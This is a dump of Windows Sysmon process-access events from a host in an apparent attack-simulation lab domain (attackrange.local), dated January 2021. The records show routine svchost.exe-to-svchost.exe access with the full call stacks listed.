10341000x800000000000000010921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.305{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
